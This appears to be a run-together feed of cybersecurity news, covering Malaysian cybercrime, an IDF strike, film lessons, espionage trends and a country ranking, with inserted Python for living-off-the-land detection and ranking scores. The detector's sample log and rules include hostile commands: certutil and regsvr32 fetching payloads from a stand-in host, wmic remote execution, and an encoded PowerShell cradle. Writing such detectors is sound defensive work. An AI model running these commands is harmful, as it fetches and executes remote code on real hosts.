LABUAN: Cyber crimes involving losses of RM67.6 million in 2,207 cases were reported in the first three months of this year, according to a senior officer of the Communications and Multimedia Ministry (KKMM) today.
Its deputy secretary-general (policy), Shakib Ahmad Shakir, said the ministry and agencies under it were concerned over the large amounts of money lost through such scams.
The three most common types of cyber crimes were cheating via telephone calls which recorded 773 cases with RM26.8 million in losses, cheating in online purchases with 811 cases totaling RM4.2 million and the ‘African Scam’ with 371 cases totaling RM14.9 million.
E-financial fraud recorded 212 cases involving losses of RM21.5 million, he said when opening a Labuan-level briefing on awareness to combat cyber crimes and human trafficking, here.
He said the losses were reported in online scams, credit card frauds, identity thefts and data breaches.
“KKMM is determined to combat cyber crimes in view of the concerns raised on the rise in cyber crimes committed through various means.
“Cyber crimes are a serious threat to the people as these frauds can cause them to lose hundreds of thousands of ringgit of their hard-earned money,” he said.
The briefing is part of the commitment of KKMM to create public awareness on cyber crimes through education and promotion and publicity campaigns.
Shakib said that according to the Commercial Crime Investigation Department, 13,058 cheating cases were reported in 2017 compared to 10,394 last year.
“I was told that telecommunication fraud is the most common form of (cyber) crime in Labuan with 16 complaints in 2017 and 19 complaints last year, a 35 per cent increase,” he said.
Shakib said the ministry would continue to cooperate with its strategic partners like the media, police, the Malaysian National News Agency (Bernama) and Information Department to combat the menace. – Bernama
KUALA LUMPUR: A national awareness plan on the management of cybersecurity and cybercrime will be launched at the end of this year, Deputy Prime Minister Datuk Seri Dr Wan Azizah Wan Ismail said today.
She said the plan, which was being developed by the National Cyber Security Agency (NACSA), was expected to be implemented in January 2020, targeting four groups – children, youths, adults and parents, as well as organisations.
Dr Wan Azizah, who is also chairman of the E-Sovereignty Committee, said various parties were involved in developing the plan, including government agencies, the private sector, industries and non-governmental organisations.
The plan was an effort to address cyber threats comprehensively besides the National Cyber Security Strategy which was still being developed, she said.
“One of the things that we (the government) stress is the management of cybersecurity and we have the National Cyber Security Strategy … where we look at cyber attacks in other countries. This is important for us to protect the banking system and so on,” she told reporters in a special interview at her office in Parliament House in conjunction with the first anniversary of the Pakatan Harapan (PH) government.
The National Cyber Security Strategy, among other things, covers the management of cyber incidents through an active cyber defence approach, which sets out proactive, integrated action at every layer of the country's system defences and information and communications technology.
Dr Wan Azizah said Malaysia is also aware that international collaboration is very important and necessary to improve the effectiveness of the management of cybersecurity and cybercrime.
She said that among the initiatives that are being implemented is developing the ASEAN Regional Forum (ARF) Cyber Security Work Plan which is a joint plan for cybersecurity among ARF member countries.
Dr Wan Azizah said Malaysia, together with Australia, has developed the ‘Cyber Point of Contact’, a directory of liaison officers in member countries that can be used to request assistance and cooperation during cyber incidents. – Bernama
The Israel Defense Forces (IDF) claim to have neutralised an “attempted” cyber attack by launching an airstrike on a building in the Gaza Strip from which, the IDF says, the attack originated.
In a video tweeted by the IDF, the building, since destroyed by Israeli drones, is described as the headquarters of Hamas military intelligence, from which a Hamas cyber unit was allegedly trying to penetrate Israeli systems.
“We thwarted an attempted Hamas cyber offensive against Israeli targets. Following our successful cyber defensive operation, we targeted a building where the Hamas cyber operatives work. HamasCyberHQ.exe has been removed,” said the Israeli Defence Forces on Twitter.
However, the IDF has not shared any details of the attempted cyber attack, saying that doing so would reveal the country's cyber capabilities.
According to Judah Ari Gross of Times of Israel, the commander of the IDF’s Cyber Division said, “We were a step ahead of them the whole time,” and “this was one of the first times where Israeli soldiers had to fend off a cyber attack while also fighting a physical battle.”
However, this is not the first time a country has answered a cyberattack with a physical one. In 2015, the U.S. military reportedly killed two ISIS hackers, Siful Haque Sujan and Junaid Hussain of the Team Poison hacking group, in drone strikes in Syria.
The commander did not reveal the name of the target, but did say that the cyber attack by Hamas was aimed at “harming the way of life of Israeli citizens.”
Tensions between Israel and Hamas have risen over the past year, with the latest conflict beginning on Friday after Hamas militants launched at least 600 rockets and mortars at Israel and shot two Israeli soldiers.
In retaliation, the Israeli military carried out its own strikes on what it said were hundreds of Hamas and Islamic Jihad targets in the coastal enclave.
So far at least 27 Palestinians and four Israeli civilians have been killed, and more than 100 people have been injured.
The IDF said one of its airstrikes targeted and killed Hamed Ahmed Abed Khudri, whom the Israeli military accused of funding Hamas rocket attacks by transferring money from Iran to armed factions in Gaza.
“Transferring Iranian money to Hamas and the PIJ [Palestinian Islamic Jihad] doesn’t make you a businessman. It makes you a terrorist,” IDF wrote in a tweet that included an image of a Toyota car in flames.
In a later development, Israel halted its air strikes on the Palestinian territory and lifted the protective restrictions imposed near the Gaza area after Palestinian officials offered a conditional ceasefire agreement to end the violence.
While stories about breaches and cyberattacks have only become commonplace in the news relatively recently, Hollywood has had an interest in cybersecurity for some time now. To coincide with the Oscars, we’re taking a look at several popular films that dealt with cyberattacks on companies or government institutions, industrial espionage, and cyberwar, in order to take away some lessons for businesses.
Endpoint security and the problem with critical infrastructure.
In Skyfall (2012), one of the more recent James Bond films, the British intelligence service MI6 is under attack and trying to stop vital information from being leaked. Bond, meanwhile, is fighting to survive and struggling to stay relevant in a world where the field agent matters less thanks to technological advances, and where popular services such as social networks can put an agent's privacy at risk. Silva, a cybercriminal and the film's villain, manages to interfere with satellite signals, attack the London Underground, tamper with elections in several African countries and destabilise the stock market, all from a computer.
Although the film touches on concepts as important as the protection of critical infrastructure, and is the first Bond film in which a cyberattack is used as a lethal weapon, one serious error needs highlighting: MI6 staff get hold of a computer belonging to Silva, the criminal hacker, and connect it to the intelligence service's own network to extract information from it.
Connecting an attacker-controlled or infected endpoint to the internal network exposes the organisation's entire infrastructure, and is a good illustration of how a simple mistake in a business environment can put data at risk; untrusted hardware belongs on an isolated analysis machine, never on the production network. Despite this slip-up, Q, MI6's technology expert, is arguably right when he says: “I'll hazard I can do more damage on my laptop, sitting in my pyjamas, before my first cup of Earl Grey than you can do in a year in the field.”
The documentary Zero Days (2016) investigates Stuxnet, the now well-known and highly sophisticated computer worm discovered in 2010 and widely believed to have been developed by the United States and Israel to sabotage Iran's nuclear programme. Stuxnet, too, reached an isolated network through an infected endpoint, in this case a USB stick, and from there injected malicious code into the programmable logic controllers (PLCs) that automated the enrichment facility's processes.
The worm is reported to have damaged around 1,000 centrifuges at the facility by altering their rotation speeds while feeding normal-looking readings back to the operators. It is widely regarded as the first known cyberweapon: malicious code that caused physical destruction of working hardware.
The malware exploited multiple zero-day vulnerabilities to infect Windows computers, but its payload was aimed specifically at the controllers driving the centrifuges used to enrich uranium for reactors and weapons. Although built for that one facility, Stuxnet spread to many machines beyond it, and copies and variants have since turned up in organisations well outside the industrial sector.
Human error in cyberwar
In the film Blackhat (2015), after attacks on nuclear power stations in Hong Kong and on the Chicago Stock Exchange, the US and Chinese governments are forced to cooperate in order to protect themselves. In light of these new threats, the FBI turns to a convicted cybercriminal, Hathaway, to help discover who is behind the IT attacks: a black hat hacker seeking to get rich by bringing down the stock market.
In this case, several of the attacks are carried out by the black hat using a RAT (Remote Access Trojan), malware that gives an attacker control of a system over a remote connection. Those working with the FBI also fall back on one of the most reliable weapons against corporate networks: a phishing email carrying a PDF attachment that drops a keylogger.
The keylogger is used to get into a piece of software exclusive to the National Security Agency (NSA), which is unwilling to cooperate with the FBI. As in the other two films discussed here, an infected USB stick also serves as an attack vector, this time to get into a bank's network and drain the accounts of the cybercriminal who is wreaking so much havoc.
These three examples from the film industry can provide us with some valuable tips for a business environment:
USB sticks of unknown origin must never be plugged into corporate systems without first being analysed for malware, and that analysis belongs on an isolated machine rather than a production workstation. Advanced platforms such as Panda Adaptive Defense provide detailed visibility of every endpoint for this kind of check. It is just as important to scan files that arrive as attachments.
Attachments from unknown senders or people who aren’t in our address books must never be opened.
We need to make sure that our employees know how to recognise social engineering attacks and avoid such common mistakes as connecting unknown devices to the corporate network.
The top 20 most notorious cyber-espionage operations have increased their activity by a third in recent years – and are looking to conduct more attacks, according to a security company.
The most advanced hacking groups are becoming bolder when conducting campaigns, with the number of organisations targeted by the biggest campaigns rising by almost a third.
A combination of new groups emerging and threat actors developing successful strategies for breaking into networks has seen the average number of organisations targeted by the most active hacking groups rise from 42 between 2015 and 2017 to an average of 55 in 2018.
Groups like Chafer, DragonFly, Gallmaker and others are all conducting highly targeted hacking campaigns as they look to gather intelligence against businesses they think hold valuable information.
Once attackers might have needed the latest zero-days to gain access to corporate networks, but now it’s spear-phishing emails laced with malicious content that are most likely to provide attackers with the initial entry they need.
And because these espionage groups are so proficient at what they do, they have well tried-and-tested means of conducting activity once they’re inside a network.
“It’s like they have steps which they go through, which they know are effective to get into networks, then for lateral movement across networks to get what they want,” Orla Cox, director of Symantec’s security response unit, told ZDNet.
“It makes them more efficient and, for organizations, it makes them harder to spot because a lot of the activity looks like traditional enterprise activity,” she added.
In many of the cases detailed in the report, attackers deploy what Symantec calls ‘living-off-the-land’ tactics: they use the everyday administrative tools already present in the enterprise to move across corporate networks and steal data, which makes the campaigns harder to discover because the activity blends in with legitimate use.
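As an added example (not code from the Symantec report or ZDNet), the following Python snippet shows what detecting living-off-the-land activity looks like in practice: it runs a handful of rules over constructed Windows process-creation records and flags built-in tools (PowerShell, certutil, wmic, regsvr32 and so on) being used in ways that are rare in legitimate administration. The pipe-delimited log format, the host and user names, and the 203.0.113.10 address are all made up for the example.

```python
import base64
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed process-creation events: timestamp|host|user|image path|command line.
# Hosts, users and 203.0.113.10 are invented (203.0.113.0/24 is a documentation range).
SAMPLE_LOG = [
    "2019-05-06T10:01:02Z|WS-042|CORP\\jdoe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA",
    "2019-05-06T10:03:15Z|WS-042|CORP\\jdoe|C:\\Windows\\System32\\certutil.exe|"
    "certutil.exe -urlcache -split -f http://203.0.113.10/update.dat C:\\Users\\Public\\update.dat",
    "2019-05-06T10:05:44Z|WS-042|CORP\\jdoe|C:\\Windows\\System32\\certutil.exe|certutil.exe -store My",
    "2019-05-06T10:06:10Z|SRV-DB01|CORP\\svc_backup|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1",
    "2019-05-06T10:09:31Z|WS-042|CORP\\jdoe|C:\\Windows\\System32\\wbem\\wmic.exe|"
    'wmic.exe /node:SRV-FILE02 /user:CORP\\jdoe process call create "cmd.exe /c whoami > C:\\Temp\\o.txt"',
    "2019-05-06T10:11:00Z|WS-042|CORP\\jdoe|C:\\Windows\\System32\\regsvr32.exe|"
    "regsvr32.exe /s /n /u /i:http://203.0.113.10/x.sct scrobj.dll",
]

# PowerShell accepts any prefix of -EncodedCommand; the long base64 token after it is the tell.
ENCODED_ARG = re.compile(r"(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{20,})", re.I)

# (rule name, image basename, pattern over the command line). These are common
# living-off-the-land patterns; a real ruleset is tuned against the site's known-good scripts.
RULES = [
    ("powershell_encoded_command", "powershell.exe", ENCODED_ARG),
    ("powershell_download_cradle", "powershell.exe",
     re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I)),
    ("certutil_fetch_or_decode", "certutil.exe", re.compile(r"-(?:urlcache|decode|verifyctl)\b", re.I)),
    ("mshta_remote_script", "mshta.exe", re.compile(r"https?:|javascript:|vbscript:", re.I)),
    ("regsvr32_remote_scriptlet", "regsvr32.exe", re.compile(r"/i:\s*https?:.*scrobj\.dll", re.I)),
    ("wmic_remote_process_create", "wmic.exe", re.compile(r"/node:\S+.*process\s+call\s+create", re.I)),
    ("bitsadmin_transfer", "bitsadmin.exe", re.compile(r"/transfer\b", re.I)),
    ("rundll32_script_host", "rundll32.exe", re.compile(r"javascript:|vbscript:", re.I)),
]


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    rule: str
    cmdline: str
    note: str = ""


def parse_line(line):
    """Split one pipe-delimited record; return None for malformed input instead of raising."""
    parts = line.rstrip("\r\n").split("|", 4)
    if len(parts) != 5:
        return None
    ts, host, user, image, cmdline = parts
    return {"ts": ts, "host": host, "user": user, "image": image, "cmdline": cmdline}


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Apply every rule whose image matches the event's executable basename."""
    basename = event["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    findings = []
    for rule, image, pattern in RULES:
        if basename == image and pattern.search(event["cmdline"]):
            note = ""
            if rule == "powershell_encoded_command":
                # Decoding the payload up front saves the analyst a step during triage.
                note = decode_encoded_command(event["cmdline"]) or "undecodable payload"
            findings.append(Finding(event["host"], event["user"], rule, event["cmdline"], note))
    return findings


def scan(lines):
    findings = []
    for line in lines:
        event = parse_line(line)
        if event:
            findings.extend(evaluate(event))
    return findings


def hosts_to_escalate(findings, min_distinct_rules=2):
    """Hosts where several different built-in tools were abused: the chain is the signal."""
    rules_by_host = defaultdict(set)
    for f in findings:
        rules_by_host[f.host].add(f.rule)
    return sorted(h for h, r in rules_by_host.items() if len(r) >= min_distinct_rules)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f"{f.host} {f.user} {f.rule}: {f.cmdline[:60]}... {f.note}")
    print("escalate:", hosts_to_escalate(hits))
```

The benign certutil and scheduled-backup lines fall through untouched, while four events on WS-042 fire four different rules. That is the point Cox makes: any single invocation of certutil or wmic can pass as ordinary administration, so hosts_to_escalate looks for several distinct built-in tools being abused on the same host rather than any one match.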
Not only is the number of targeted campaigns on the rise, but there is a larger variety in the organisations being targeted. Organisations in sectors like utilities, government and financial services have regularly found themselves targets of these groups, but increasingly the groups are expanding their attacks to new sectors.
“Often in the past they’d have a clear focus on one sector, but now we see these campaigns can focus on a wide variety of targets, ranging from telecoms companies, hotels, universities. It’s harder to pinpoint exactly what their end goal is,” said Cox.
While intelligence gathering remains the key goal of many of these campaigns, some are beginning to expand by also displaying an interest in compromising systems.
This is a particularly worrying trend, because while stealing data in itself is bad enough, attackers with the ability to operate cyber-physical systems could be much worse.
In the face of a rise in targeted attacks, governments are increasingly pointing the finger not just at nations but at individuals believed to be involved in cyber espionage. For example, the United States has indicted individuals it claims are responsible for conducting cyber attacks, among them citizens of Russia, North Korea, Iran and China. Symantec’s report suggests that such indictments might disrupt some targeted operations, but cyber espionage campaigns are unlikely to disappear anytime soon.
With so much of our information (including incredibly personal data) being found online, cybersecurity is of the utmost importance.
So just where in the world are you cyber safe – if anywhere?
Our study looked at 60 countries and found huge variances in a number of categories, from malware rates to cybersecurity-related legislation. In fact, not one country is “top of the class” across the board. All of the countries we analyzed could do with some significant improvements.
However, there were some countries that lacked significantly in a variety of areas and others who outperformed the majority of countries. So with that in mind, we’ve created rankings for these 60 countries, from the least cyber safe to the most cyber safe.
Our methodology: how did we find the countries with the worst cybersecurity?
We considered seven criteria, each of which had equal weight in our overall score. These were:
The percentage of mobiles infected with malware – software designed to gain unauthorized access to, destroy, or disrupt a device’s system
The percentage of computers infected with malware – software designed to gain unauthorized access to, destroy, or disrupt a computer’s system
The number of financial malware attacks – malware designed to steal money from victims’ bank accounts
The percentage of telnet attacks (by originating country) – attacks on exposed Telnet services, typically brute-force login attempts against poorly secured IoT devices, which are then used to spread malware
The percentage of attacks by cryptominers – software that’s developed to take over a user’s computer and use its resources to mine currency (without the user’s permission)
The best-prepared countries for cyber attacks
The countries with the most up-to-date legislation
Apart from the latter two, all of the scores were based on the percentage of attacks during 2018. The best-prepared countries for cyber attacks were scored using the Global Cybersecurity Index (GCI) scores. The most up-to-date legislation was scored based on existing legislation (and drafts) that covered seven categories (national strategy, military, content, privacy, critical infrastructure, commerce, and crime). Countries received a point for having legislation in a category or half a point for a draft.
For each criterion, a country’s score was determined by where its value fell between the best and worst values observed across the 60 countries. The least cyber-secure value received 100 points, the most cyber-secure value received zero, and every country in between was scored in proportion to its position between those two extremes.
The total score was achieved by averaging each country’s score across the seven categories.
All of the data used to create this ranking system is the latest available, and we have only included countries where we could cover all of the data points.
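As an added worked example of the scoring scheme described above (this is not Comparitech’s code, and the four countries and their figures are invented for illustration), the following Python reproduces the method: each criterion is scaled between the observed extremes, with 100 for the least secure value and 0 for the most secure; the two criteria where a higher raw value is better (GCI score and legislation) are inverted; legislation counts 1 point per law and 0.5 per draft across the seven categories; countries missing any data point are excluded before the extremes are computed; and the total is an equal-weight average. It reads “on a percentile basis” as linear scaling between the extremes, which is an assumption about the original method.

```python
from statistics import mean

LEGISLATION_CATEGORIES = ("national strategy", "military", "content", "privacy",
                          "critical infrastructure", "commerce", "crime")

# Criteria where a higher raw value means LESS secure (scaled towards 100).
HIGHER_IS_WORSE = ("mobile_malware_pct", "financial_malware_pct", "computer_malware_pct",
                   "telnet_attack_pct", "cryptominer_pct")
# Criteria where a higher raw value means MORE secure (scaled towards 0).
HIGHER_IS_BETTER = ("gci_score", "legislation_points")
CRITERIA = HIGHER_IS_WORSE + HIGHER_IS_BETTER


def legislation_points(status):
    """status maps a category to 'law', 'draft' or None: 1 point per law, 0.5 per draft."""
    points = 0.0
    for category in LEGISLATION_CATEGORIES:
        state = status.get(category)
        if state == "law":
            points += 1.0
        elif state == "draft":
            points += 0.5
        elif state is not None:
            raise ValueError(f"unknown legislation state {state!r} for {category}")
    return points


def scale(value, lo, hi, higher_is_worse):
    """Position of value between the observed extremes: 100 = least secure, 0 = most secure."""
    if hi == lo:
        return 0.0  # every country tied on this criterion; it cannot separate them
    fraction = (value - lo) / (hi - lo)
    return 100.0 * (fraction if higher_is_worse else 1.0 - fraction)


def score_countries(raw):
    """raw: {country: {criterion: value}} -> {country: (total, {criterion: scaled score})}.
    Countries missing any data point are dropped before the extremes are computed."""
    complete = {c: v for c, v in raw.items() if all(k in v for k in CRITERIA)}
    if not complete:
        return {}
    per_criterion = {c: {} for c in complete}
    for criterion in CRITERIA:
        values = [v[criterion] for v in complete.values()]
        lo, hi = min(values), max(values)
        for country, v in complete.items():
            per_criterion[country][criterion] = scale(
                v[criterion], lo, hi, criterion in HIGHER_IS_WORSE)
    # Equal weight: the total is a plain average over the seven criteria.
    return {c: (mean(s.values()), s) for c, s in per_criterion.items()}


def rank_worst_to_best(scored):
    return sorted(scored, key=lambda c: scored[c][0], reverse=True)


# Constructed input for four hypothetical countries; none of these figures come from the study.
SAMPLE_RAW = {
    "Country A": {"mobile_malware_pct": 35.0, "financial_malware_pct": 3.0,
                  "computer_malware_pct": 32.0, "telnet_attack_pct": 0.01,
                  "cryptominer_pct": 14.0, "gci_score": 0.25,
                  "legislation_points": legislation_points(
                      {"national strategy": "law", "crime": "law", "privacy": "draft"})},
    "Country B": {"mobile_malware_pct": 1.3, "financial_malware_pct": 0.3,
                  "computer_malware_pct": 5.9, "telnet_attack_pct": 27.0,
                  "cryptominer_pct": 0.6, "gci_score": 0.92,
                  "legislation_points": legislation_points(
                      {c: "law" for c in LEGISLATION_CATEGORIES})},
    "Country C": {"mobile_malware_pct": 18.0, "financial_malware_pct": 1.5,
                  "computer_malware_pct": 19.0, "telnet_attack_pct": 10.0,
                  "cryptominer_pct": 7.0, "gci_score": 0.6,
                  "legislation_points": legislation_points(
                      {"national strategy": "law", "military": "law", "privacy": "law",
                       "crime": "law", "commerce": "draft"})},
    # Country D has no telnet figure, so it is excluded from the ranking.
    "Country D": {"mobile_malware_pct": 9.0, "financial_malware_pct": 1.0,
                  "computer_malware_pct": 12.0, "cryptominer_pct": 3.0,
                  "gci_score": 0.7, "legislation_points": 5.0},
}

if __name__ == "__main__":
    scored = score_countries(SAMPLE_RAW)
    for country in rank_worst_to_best(scored):
        total, parts = scored[country]
        print(f"{country}: {total:.1f}  " + "  ".join(f"{k}={v:.0f}" for k, v in parts.items()))
```

Running it shows the effect the article describes: Country A is worst on six of seven criteria but best on telnet, so its total is 600/7 rather than 100, while Country B’s single worst-in-class telnet score still leaves it with the best total. Because the extremes are taken from the sample itself, adding or removing a country changes everyone else’s scaled scores, which is why the study only ranks countries with complete data.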
Which is the least cyber-secure country in the world?
According to our study, Algeria is the least cyber-secure country in the world. It was the highest-ranking country for lack of legislation and computer malware rates, and also received a high score in the categories for mobile malware and preparation for cyber attacks.
Other high-ranking countries were Indonesia, Vietnam, Tanzania, and Uzbekistan.
Some countries ranked at the top of one category but did better in others, improving their overall score. Germany received the highest score for financial malware, and China received the highest score as the country where most telnet attacks originated from.
The highest-scoring countries per category were:
Highest percentage of mobile malware infections – Bangladesh – 35.91% of users
Highest number of financial malware attacks – Germany – 3% of users
Highest percent of computer malware infections – Algeria – 32.41%
Highest percentage of telnet attacks (by originating country) – China – 27.15%
Highest percentage of attacks by cryptominers – Uzbekistan – 14.23% of users
Least prepared for cyber attacks – Vietnam – 0.245 score
Which is the most cyber-secure country in the world?
Our findings revealed Japan to be the most cyber-secure country in the world. It scored incredibly low across the majority of categories, only scoring a little higher in the preparation for cyber attacks and legislation categories.
Other top-performing countries included France, Canada, Denmark, and the United States.
As before, some countries scored well in one category but had other scores that brought their average up. These include Ukraine, which had the lowest financial malware rate, and Uzbekistan, Sri Lanka, and Algeria, which had the lowest telnet attack scores.
The lowest-scoring countries per category were:
Lowest percentage of mobile malware infections – Japan – 1.34% of users
Lowest number of financial malware attacks – Ukraine – 0.3% of users
Lowest percent of computer malware infections – Denmark – 5.9% of users
Lowest percentage of telnet attacks (by originating country) – Algeria, Uzbekistan, and Sri Lanka – 0.01%
Lowest percentage of attacks by cryptominers – Denmark – 0.61% of users
Best prepared for cyber attacks – Singapore – 0.925 score
Most up-to-date legislation for cybersecurity – France, China, Russia, and Germany – all 7 categories covered
Overall cybersecurity rankings (from the worst to the best)
[The full ranking table did not survive extraction. Its columns were: Percentage of Mobiles Infected with Malware; Financial Malware Attacks (% of Users); Percentage of Computers Infected with Malware; Percentage of Telnet Attacks by Originating Country (IoT); Percentage of Attacks by Cryptominers; Best Prepared for Cyberattacks; Most Up-to-Date Legislation.]
What can we take away from these findings?
Despite some countries having clear strengths and weaknesses, there is definite room for improvement in each and every one. Whether they need to strengthen their legislation or users need help putting better protections in place on their computers and mobiles, there’s still a long way to go to make our countries cyber secure.
Plus, as the landscape of cybersecurity constantly changes (cryptominers are growing in prevalence, for example), countries need to try and get one step ahead of cybercriminals.
Brief test ‘disconnecting’ Russia from the internet set to take place before April 1
Reports claim move is part of preparations for a potential cyber-war in the future
Russia has been accused of carrying out a series of cyber-attacks in recent years, prompting NATO and its allies to threaten the country with sanctions
Russia is set to disconnect from the internet temporarily as part of preparations for a potential cyber-war in the future, it has been claimed.
The test – set to take place before April – will see data passing between organisations and Russian citizens remain inside the country instead of being routed internationally.
It comes after a law was introduced to Russia’s parliament last year mandating technical changes required to allow Russia’s internet to operate independently.
April 1 has reportedly been set as the deadline for submitting amendments to the draft law – dubbed the Digital Economy National Program – but the timing of the test has yet to be set in stone, it has been reported.
Under the law, Russia’s internet service providers (ISPs) would be required to ensure the independence of the country’s Runet internet space should foreign powers attempt to isolate the nation online.
Russia has been accused of carrying out a series of cyber-attacks in recent years, prompting NATO and its allies to threaten sanctions.
The country’s ISPs are said to be broadly supportive of the goals of the law but disagree over how it could be implemented.
There are, however, fears among the providers that such a test could also cause ‘major disruption’, according to ZDNet.
The law could also see Russia create its own DNS root infrastructure, so that name resolution inside the country would keep working even if links to the root servers abroad were cut.
A dozen organisations oversee the root servers for DNS – none of them based in Russia, the BBC reports.
In October, Britain publicly accused Russia’s military intelligence service of carrying out a campaign of reckless and destabilising cyber-attacks across the world.
Foreign Secretary Jeremy Hunt said the Kremlin had been working in secret to wage indiscriminate and illegal cyber-attacks on democratic institutions and businesses.
In a damning charge sheet, the Government firmly pinned the blame for a string of cyber-attacks on the GRU, the organisation also accused of poisoning double agent Sergei Skripal.
The Foreign Office said the National Cyber Security Centre had assessed with ‘high confidence’ that the GRU was ‘almost certainly’ responsible for multiple attacks which have cost economies millions of pounds.
It added: ‘Given the high confidence assessment and the broader context, the UK Government has made the judgment that the Russian government – the Kremlin – was responsible.’
Hacks included those on the governing body of the Democratic Party in the US, the World Anti-Doping Agency, metro systems and airports in Ukraine, Russia’s central bank and two Russian media outlets.
KUALA LUMPUR: The Government plans to establish a National Cybersecurity policy to better secure the nation against threats, says Gobind Singh Deo.
The Communications and Multimedia Minister said his ministry will be spearheading the policy in collaboration with the National Cybersecurity Agency and the Malaysian Communications and Multimedia Commission.
“With Malaysia’s digital economy growing by leaps and bounds, it is inevitable that there will be unintended consequences.
“Threats like data breaches and theft, sabotage, intrusion, and cyber espionage can have adverse impacts on organisations and the state,” he said.
He said the ministry is now in discussion with various parties to come up with a robust policy.
One of the areas is to develop more local cybersecurity talents.
“Developing the right talent is a very important aspect of cybersecurity preparedness.
“It is crucial that we establish a sustainable model with the cooperation of various government agencies (along with) academic and private institutions,” he said.
Gobind added that he will suggest amending laws to combat cyberbullying and cybercrimes.
“We could introduce new provisions in the Penal Code, for example, so that such crimes could be investigated by the police.
“But before we do all these, I am in the process of discussing it with the police to get their views,” he said.
As a digital technology, biometrics are almost always bound up in some way with cybersecurity. With that in mind, Biometric Update has reviewed predictions for the year ahead to present the most noteworthy, controversial, and troubling among them.
First major biometric hack
A single-factor biometric authentication system will be successfully hacked at scale in 2019, according to security firm Secplicity. This will drive increased adoption of multi-factor authentication, the company says.
Experian’s Data Breach Industry Forecast 2019 also predicts biometric hacking will increase next year, as attackers seek to exploit stolen or altered biometric data, spoofing methods, and deteriorated or manipulated fingerprint and facial recognition sensors. In the report, the company urges organizations to secure all layers of their biometric systems, and to encrypt and store all biometric data in secure servers.
New facial recognition vulnerabilities spur behavioral biometrics
Non-biometric two-factor authentication, SMS codes in particular, will be undermined by “SIM swaps” (in which an attacker takes over the victim’s phone number) and persistent phishing, cybersecurity service provider Forcepoint says. Biometrics can provide the answer, the company predicts, but behaviour analytics will be the preferred method of protection.
New laws and regulations
Acuant President and CEO Yossi Zekri told Biometric Update in an email that new laws or regulations are coming.
“The progress of GDPR will drive continued adoption of identity-related legislation across the world,” he writes. “The United States, currently a hotbed of frustration over the mismanagement of personally identifiable information (PII) and lack of protection for digital identity, will begin to adopt similar legislation in 2019. Recent revelations into questionable business practices and Congress’ increasing focus on technology behemoths Facebook, Amazon, Google and Netflix will drive the U.S. government to rein in the industry with compliance requirements (similar to Sarbanes-Oxley after the Enron and Worldcom debacles).”
Zekri also predicts that systems leveraging both AI and human judgement will outperform the accuracy of fully automated identity verification solutions, and that with an increasing consumer focus on self-sovereign identity, “organizations will start to adopt methods to verify individuals without using personal data. Identity scores – or a similar scoring mechanism – will emerge as a way to verify the individual and replace the need to share PII.”
Nok Nok Labs CEO Phil Dunkelberger also tells Biometric Update that companies should be prepared for a more challenging regulatory environment in the year ahead.
Blockchain hits a roadblock
Mitek CTO Steve Ritter thinks blockchain will be revealed to be unready for mainstream identity platform use in coming year.
“While blockchain continues to grow in popularity with varying use cases, for it to make a significant impact with identity platforms, it will need to considerably improve any existing solution,” Ritter says. “The biggest challenge with blockchain for identity verification is that a public distributed ledger would be accessible to anyone who needed it but owned by no one, which will likely create privacy and security concerns. The system would need buy-ins from both consumers and businesses to get traction and reach an acceptance “tipping point.” It would take time and money to promote the service, far more than what would be required to create and run it. Until businesses figure out how to monetize blockchain and where it can best be adopted in their businesses, we are unlikely to see this technology revolutionize identity management. As a result, expect that at least 30 percent of data management projects using blockchain will fail and more identity platforms will abandon development of blockchain.”
Account takeover fraud, which cost $5.1 billion in 2017 according to Javelin Research, will decrease, Ritter says, as new identity document verification technology turns the tide and prevents more than 40 percent of account takeover fraud attempts in 2019.
Businesses move away from KBA
TrustID’s 2018 State of Call Center Authentication report shows that a mere 10 percent of call center agents very confidently trust knowledge-based authentication (KBA) to accurately identify callers. This is with good reason, the company says, as there were 668 confirmed data breaches and 22.41 million records exposed in the first half of 2018, according to the Identity Theft Resource Center. TrustID says 2019 marks “the final countdown” for KBA, with the factor fading away within five years.
Ritter also predicts that digital identity verification will replace KBA for online marketplaces, as continuing growth in online transactions and data breaches drives a push for greater regulation.
Other predictions from TrustID include that fraud will continue to shift towards the phone channel, that the window for accurately verifying financial transactions will shrink, and that attacks on healthcare organisations will increase.
Internet of Things devices scam users
“Your smart fridge will start scamming you,” BioCatch Chief Cyber Officer Uri Rivner tells Forbes. “IoT-connected appliances such as refrigerators and washing machines already produce unattended payments that the user cannot personally verify. Fraudsters see this vulnerability now and will begin to take advantage of it.”
It stands to reason that the challenges preventing fraud even when the payer is present would only increase when the device authorizes payments without the user.
All readers are invited to make cybersecurity predictions for 2019 in the comments below.
Most organizations today have multiple attack vectors that require monitoring and defending. Government cybersecurity teams, in comparison, have to manage countless additional entry points for threat actors. While most industries must understand and defend against attacks from vendors, satellite offices, wireless networks and bring-your-own-device (BYOD) threats, governments also have to worry about large numbers of disparate entities that tie into a central information technology hub.
As seen over the past 18 months with attacks in Colorado, Atlanta, Baltimore and Dallas, among others, cities and states must protect their infrastructure, transportation, social services, healthcare, emergency services and many other divisions. The sheer number of connections into government networks substantially increases the risk and complexity facing these administrations.
Extortion via ransomware seems to be the popular choice for many cybercriminals today, but what does tomorrow bring? With so many government services dependent on technology, there are many opportunities for a denial-of-service (DoS) attack. Government cybersecurity experts need to stay ahead of these criminals and, in doing so, understand the environments they’re defending. Defenders must see the entire threat landscape and understand where attacks can come from. Protecting environments with one point of entry is easy; unfortunately, that situation rarely exists in the real world, particularly with government infrastructure.
The Complexity of Governments Increases Risk
